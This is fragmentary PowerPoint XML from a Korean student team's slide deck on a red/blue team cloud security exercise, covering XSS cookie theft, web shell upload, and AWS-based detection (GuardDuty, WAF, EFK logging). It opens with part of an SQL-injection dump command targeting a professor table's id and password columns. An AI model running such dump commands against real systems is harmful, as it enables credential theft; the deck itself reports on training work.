              <a:t>-p "id" -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>eclass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  -T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>prof_mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>call_num,id,pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> --dump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516C71-91CD-A7EA-FA6E-567AD5C8739C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487185" y="2840091"/>
            <a:ext cx="5970887" cy="32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2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1C32794-4798-D0CC-5D0F-77D51080E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25" y="2336196"/>
            <a:ext cx="7220204" cy="3418683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54DC497B-E18A-1834-AC53-334C04F77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96" y="2151529"/>
            <a:ext cx="8297433" cy="307700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82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631074" y="215152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XSS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1952" y="3400592"/>
            <a:ext cx="168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게시판을 통한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클라이언트 쿠키 값 탈취 및 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>악성 페이지 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>접속 유도 가능성 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9CC3D04-7432-EE05-B633-8F0D446E66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911" r="619" b="5043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4807324" y="1222010"/>
            <a:ext cx="4255994" cy="123207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B5D4CED-1328-7947-2DAF-DD390ACD3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1" y="2282748"/>
            <a:ext cx="7817252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82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인프라 및 웹 취약점 진단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325704" y="215152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Web Shell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1952" y="3400592"/>
            <a:ext cx="1682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파일 업로드 취약점을 활용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웹에서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시스템 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>명령 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>실행 여부 확인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AA631D-151C-86C3-2C71-839BBC2F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54" y="2659911"/>
            <a:ext cx="5655514" cy="2435467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9BBEEB8-32B9-DF3E-AB22-7783161B1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80" y="2286888"/>
            <a:ext cx="8020462" cy="318151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DE81CAE-53BB-368A-E3A5-77D5295A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99" y="1819275"/>
            <a:ext cx="83534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189245" y="872277"/>
            <a:ext cx="6002755" cy="4483771"/>
            <a:chOff x="6817895" y="310803"/>
            <a:chExt cx="600275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931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침해 시도 탐지 및 대응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600275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600275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5" y="1156356"/>
            <a:ext cx="2356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Jungle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" b="1" spc="-3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48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5" y="1985268"/>
            <a:ext cx="33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bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ShineMusket</a:t>
            </a:r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(RED)</a:t>
            </a:r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94915" y="3013501"/>
            <a:ext cx="508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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ShineMusket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" b="1" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(BLUE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4800" b="1" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00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859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2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1574" y="2526339"/>
            <a:ext cx="992976" cy="9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raphic 1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75598" y="2518433"/>
            <a:ext cx="955521" cy="95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raphic 1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44454" y="2556880"/>
            <a:ext cx="972121" cy="9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그림 2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89362" y="2579872"/>
            <a:ext cx="1631554" cy="972121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="그림 2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4986" y="2558129"/>
            <a:ext cx="972121" cy="972121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="121" name="그림 2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03381" y="2620392"/>
            <a:ext cx="972121" cy="866860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="122" name="Graphic 1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94648" y="2508908"/>
            <a:ext cx="972121" cy="9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raphic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000075" y="2538215"/>
            <a:ext cx="972121" cy="9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TextBox 76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10373033" y="3737167"/>
            <a:ext cx="1664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elasticsearch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="TextBox 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8924935" y="3736347"/>
            <a:ext cx="1034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fluentd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="TextBox 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7382015" y="3735527"/>
            <a:ext cx="94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Kibana</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="TextBox 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459267" y="3734707"/>
            <a:ext cx="1591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CloudFront</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="TextBox 80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690337" y="3733887"/>
            <a:ext cx="168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WAF &amp; Shield</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="TextBox 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2127026" y="3742592"/>
            <a:ext cx="1446552" cy="36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GuardDuty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="TextBox 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486337" y="3732247"/>
            <a:ext cx="1317287" cy="36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Detective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379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740728"/>
            <a:ext cx="12192000" cy="3117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75355"/>
            <a:ext cx="12192000" cy="2855926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Graphic 20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59309" y="195386"/>
            <a:ext cx="845868" cy="82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raphic 19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297061" y="195273"/>
            <a:ext cx="828103" cy="828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81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="636797"/>
            <a:ext cx="1654370" cy="36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2.GuardDuty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="280088"/>
            <a:ext cx="1507787" cy="36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1.Detective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033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1978" y="197569"/>
            <a:ext cx="1079863" cy="1095053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="그림 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38408" y="193144"/>
            <a:ext cx="972121" cy="972121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="그림 2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9939" y="255407"/>
            <a:ext cx="972121" cy="866860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605317" y="981031"/>
            <a:ext cx="2062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5.elasticsearch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7634461" y="616528"/>
            <a:ext cx="136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4.fluentd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677020" y="252028"/>
            <a:ext cx="124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3.Kibana</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813811" y="1321056"/>
            <a:ext cx="10599015" cy="475340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lIns="502920" tIns="9144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36" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1494957" y="2020369"/>
            <a:ext cx="1027270" cy="1071440"/>
            <a:chOff x="5625233" y="3348677"/>
            <a:chExt cx="1115568" cy="716529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="Graphic 60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16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5625230" y="3803594"/>
              <a:ext cx="1115569" cy="1705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pic>
        <p:nvPicPr>
          <p:cNvPr id="39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0879" y="2830663"/>
            <a:ext cx="1081362" cy="964273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40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9511" y="2743652"/>
            <a:ext cx="2335099" cy="1215314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41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0072" y="2891777"/>
            <a:ext cx="1051880" cy="1051880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1486022" y="2981852"/>
            <a:ext cx="1027270" cy="1071440"/>
            <a:chOff x="5625233" y="3348677"/>
            <a:chExt cx="1115568" cy="716529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="Graphic 60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TextBox 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5625225" y="3803594"/>
              <a:ext cx="1115571" cy="1705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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1482960" y="4156639"/>
            <a:ext cx="1027270" cy="1071440"/>
            <a:chOff x="5625233" y="3348677"/>
            <a:chExt cx="1115568" cy="716529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="Graphic 60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TextBox 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5625233" y="3803594"/>
              <a:ext cx="1115568" cy="1705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mazon Ember"/>
                  <a:cs typeface="Arial"/>
                </a:rPr>
                <a:t>NGINX</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="37" idx="3"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2216036" y="2362200"/>
            <a:ext cx="1624843" cy="95060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49" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="43" idx="3"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2207101" y="3312800"/>
            <a:ext cx="1633778" cy="10882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50" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="3"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2204039" y="3312800"/>
            <a:ext cx="1636840" cy="1185669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51" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4922242" y="3311224"/>
            <a:ext cx="1173758" cy="1575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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7668552" y="3294975"/>
            <a:ext cx="1393846" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="545B64">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd w="med" len="sm"/>
            <a:tailEnd type="arrow" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164554" y="2835708"/>
            <a:ext cx="1006587" cy="272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로그스트림</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3874972" y="3940608"/>
            <a:ext cx="1006587" cy="272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로그 수집</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323766" y="3917110"/>
            <a:ext cx="1006587" cy="2708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로그 저장소</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994675" y="3940608"/>
            <a:ext cx="139384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mazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>로그 대시보드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0370" y="255397"/>
            <a:ext cx="3795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8" y="778617"/>
            <a:ext cx="7535498" cy="5679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0161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클라우드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(CLOUD)?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99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8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98913" y="282785"/>
            <a:ext cx="477541" cy="477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80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5576454" y="290398"/>
            <a:ext cx="222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6.WAF &amp; Shield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7385" y="860923"/>
            <a:ext cx="5871451" cy="581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295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90574"/>
            <a:ext cx="5614358" cy="59626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8564" y="771525"/>
            <a:ext cx="6623435" cy="608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438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52559"/>
            <a:ext cx="12192000" cy="2195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EFC673-E0AF-E7FB-4048-B4889F56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6888" y="1169995"/>
            <a:ext cx="2844498" cy="3201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E9028F-EACD-B233-6441-B8E32989B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62259" y="1169995"/>
            <a:ext cx="3255169" cy="241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809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4469"/>
            <a:ext cx="12034157" cy="5121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638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74" y="908229"/>
            <a:ext cx="101060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44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638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/>
                </a:solidFill>
              </a:rPr>
              <a:t>탐지 및 대응 방안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055E420-1CBD-40BD-CAC8-A769E462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6" y="1122390"/>
            <a:ext cx="11427723" cy="46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309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클라우드의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 미래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2" name="Google Shape;722;p36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3" name="Google Shape;723;p36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5" name="Google Shape;7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5" y="1265814"/>
            <a:ext cx="5791212" cy="43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2" y="1609875"/>
            <a:ext cx="5993514" cy="38708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59E14-88A4-98CA-3EBE-23EF435D7A99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57200-EB52-54D2-6EFD-9BEB57C4A600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716"/>
            <a:ext cx="3638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/>
                </a:solidFill>
              </a:rPr>
              <a:t>클라우드의 미래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Google Shape;731;g1839216f502_6_18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2" name="Google Shape;732;g1839216f502_6_18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4" name="Google Shape;734;g1839216f502_6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400" y="1425200"/>
            <a:ext cx="5650450" cy="3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839216f502_6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5" y="1425200"/>
            <a:ext cx="6345274" cy="37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D9957-B8ED-0662-D109-CB152EF54531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C4452-4894-4F84-4E3F-B89EF5B24C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716"/>
            <a:ext cx="3638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/>
                </a:solidFill>
              </a:rPr>
              <a:t>클라우드의 미래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1839216f502_6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25" y="908050"/>
            <a:ext cx="9991649" cy="57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839216f502_6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25" y="908038"/>
            <a:ext cx="9991660" cy="573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g1839216f502_6_28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3" name="Google Shape;743;g1839216f502_6_28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AB38F6-B19B-AD61-F87A-59925A2DFF79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61254-7331-A155-808E-A414D81BD380}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716"/>
            <a:ext cx="3638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/>
                </a:solidFill>
              </a:rPr>
              <a:t>클라우드의 미래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20793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873251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1374058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클라우드란</a:t>
            </a:r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642696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유저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유저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1010120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유저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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>클라우드</a:t>
            </a:r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 개념도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866742" y="1821163"/>
            <a:ext cx="5839327" cy="2020407"/>
            <a:chOff x="5866742" y="1821163"/>
            <a:chExt cx="5839327" cy="202040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3B2B03-9958-7080-A8FA-B021EDFEB92B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5866742" y="1821163"/>
              <a:ext cx="5839327" cy="2020407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A993AD8-5CEA-2D1B-82AC-2D89F5B58074}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7339957" y="2085659"/>
              <a:ext cx="2833026" cy="1491414"/>
              <a:chOff x="5746189" y="598302"/>
              <a:chExt cx="3891520" cy="2048645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917425D-F03B-F354-FEC0-11250975C51C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5746189" y="986888"/>
                <a:ext cx="1660060" cy="166005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2D86A9D-39F0-778D-7C2D-6B2967ABF872}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8103795" y="1113033"/>
                <a:ext cx="1533914" cy="15339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49E913F-178D-7981-553C-769FFE1B1252}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6708667" y="598302"/>
                <a:ext cx="2048645" cy="2048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7893051" y="3360635"/>
              <a:ext cx="1791494" cy="2140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232424" y="2493334"/>
              <a:ext cx="299582" cy="86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971684" y="2423484"/>
              <a:ext cx="350344" cy="939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7893050" y="3340894"/>
              <a:ext cx="1791495" cy="220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8018529" y="2753893"/>
            <a:ext cx="153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146772"/>
                </a:solidFill>
              </a:rPr>
              <a:t>클라우드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06249-2B88-25D8-D524-FF489E09DC0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066F9-F180-2B58-EC8D-90A707CEE73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716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클라우드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(CLOUD)?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102822-4268-D316-39FF-5B47EEE2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2753893"/>
            <a:ext cx="4873135" cy="2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87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D379F-0D7A-E10A-C2FD-B3F877B38412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3874879" y="2228671"/>
            <a:ext cx="44422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Pretendard Black"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Q&amp;A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/>
              <a:ea typeface="Pretendard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436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K10ud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 발표 마치겠습니다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8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K10ud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>팀원 일동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C06249-2B88-25D8-D524-FF489E09DC0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066F9-F180-2B58-EC8D-90A707CEE73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716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클라우드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(CLOUD)?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="SaaS vs PaaS vs IaaS: What's The Difference &amp; How To Choose – BMC Software  |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77" y="795936"/>
            <a:ext cx="7033848" cy="65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5977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왜 </a:t>
              </a:r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클라우드인가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60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595446" y="3947979"/>
            <a:ext cx="300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62009" y="3931023"/>
            <a:ext cx="158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PLACE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2" descr="돈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05" y="2591936"/>
            <a:ext cx="1330062" cy="13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cdn-icons-png.flaticon.com/512/117/11796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98" y="2557847"/>
            <a:ext cx="1330062" cy="13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cdn-icons-png.flaticon.com/512/8841/884157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04" y="2509445"/>
            <a:ext cx="1591296" cy="15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1291992" y="3947979"/>
            <a:ext cx="176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MONEY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cdn-icons-png.flaticon.com/512/43/438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88" y="3210533"/>
            <a:ext cx="436929" cy="4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-icons-png.flaticon.com/512/43/438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704" y="3210532"/>
            <a:ext cx="436929" cy="4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5A928-E7A9-B924-14E0-BA51082CDD11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7515-3866-7DBD-14A9-4BAA16C44625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716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왜 클라우드인가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 -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73603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009255"/>
            <a:ext cx="6075377" cy="567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67" y="1009254"/>
            <a:ext cx="5601469" cy="56796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18" y="1009253"/>
            <a:ext cx="5960610" cy="56796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037" y="1009252"/>
            <a:ext cx="5251516" cy="56796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14" y="1009251"/>
            <a:ext cx="5226082" cy="567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716" y="1009255"/>
            <a:ext cx="4000687" cy="5679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D7087A-A416-AB1A-CC7D-3C07A403A672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069BB-EE36-C3AF-B35F-6AC8A57132E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716"/>
            <a:ext cx="428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왜 클라우드인가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 –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사용중인 기업</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11126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lt1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
        </a:ln>
      </a:spPr>
      <a:bodyPr anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr lvl="0"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920</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>328</Paragraphs>
  <Slides>51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Arial</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Pretendard Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Sandoll 삼립호빵체 Outline</vt:lpstr>
      <vt:lpstr>나눔스퀘어_ac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라우터 작동 방식</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>클라우드 워치 - 슬랙 시스템 구성도</vt:lpstr>
      <vt:lpstr>클라우드 워치 - 슬랙 시스템</vt:lpstr>
      <vt:lpstr>EFK Stack 시스템 구성도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K10ud</dc:creator>
  <cp:lastModifiedBy>최상현</cp:lastModifiedBy>
  <cp:revision>204</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-03T01:14:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-17T04:18:11Z</dcterms:modified>
  <cp:version/>
</cp:coreProperties>
</file>